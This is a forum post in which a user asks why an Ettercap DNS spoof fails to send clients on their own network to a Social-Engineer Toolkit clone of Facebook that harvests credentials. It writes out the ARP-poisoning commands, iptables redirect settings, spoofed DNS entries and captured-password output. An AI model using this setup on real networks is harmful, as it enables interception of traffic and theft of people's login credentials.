Distro: BT5 R3 , VM: VMware
Hey guys. I've been testing Ettercap/SET on my own personal network and I've ran into a problem: Ettercap doesn't seem to want to redirect the DNS spoof.
SET seems to be working great:
Then I get prompted with:
Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner
So I enter wlan0's IP address (192.168.1.4)
IP address for the POST back in Harvester/Tabnabbing
If I go on another computer on the network and navigate to http://192.168.1.4 it works great. It looks just like Facebook and it even displays the POST results:
The issue I'm having is with ettercap. I'll walk you through the steps I did:
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: email=test
POSSIBLE PASSWORD FIELD FOUND: pass=test
Then I verified that I changed ec_uid and ec_gid's values to 0 as well as removing the # before the re_dir lines under ip_tables:
I went ahead and did the same thing for /usr/local/etc/etter.conf
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Next I cleared out the etter.dns file and put the following (/usr/local/share/ettercap/etter.dns):
Finally I started ettercap
facebook.com A 192.168.1.4
*.facebook.com A 192.168.1.4
www.facebook.com PTR 192.168.1.4
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
Whenever I try to navigate to facebook.com on a Client in my network, it actually directs to Facebooks page (https://www.facebook.com) as opposed to my SET clone (192.168.1.4). I tried changing it from facebook to other sites as well and nothing seems to get ettercap to redirect traffic. Again though, if I navigate to 192.168.1.4 on a machine on the network, it WILL go to the SET clone page and work correctly.
I wanted to verify that I wasn't making any simple mistakes again, so I double checked to make sure I was on the subnet (even though I knew I already was);
arp-scan -interface wlan0 --localnet
I verified that all of the etter.conf and the etter.dns files were correct and reflect what I posted. I even tried manually adding the gateway IP instead of just using // // , as well as using the autoadd as opposed to dns_spoof
Interface: wlan0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1 00 (Unknown)
192.168.1.5 (Unknown) (DUP: 2)
192.168.1.3 4 (Unknown) (DUP: 2)
192.168.1.15 (Unknown) (DUP: 2)
192.168.1.13 (Unknown) (DUP: 2)
ettercap -Tqi wlan0 -M arp:remote // /192.168.1.1/ -P autoadd
Just like before, it's producing the same result. It's not performing an actual DNS spoof to any client on the network, however, if a client was to navigate to https://192.168.1.4 ("attacker") it works correctly. Any other ideas by chance? I've been trying to research this and doing different methods but I keep running into the same issue. Thanks guys, I really appreciate your time!
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> XX:XX:XX:XX:XX:XX 192.168.1.4 255.255.255.0
Privileges dropped to UID 0 GID 0...
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==>| 100.00 %
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : 192.168.1.1 XX:XX:XX:XX:XX:XX
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating autoadd plugin...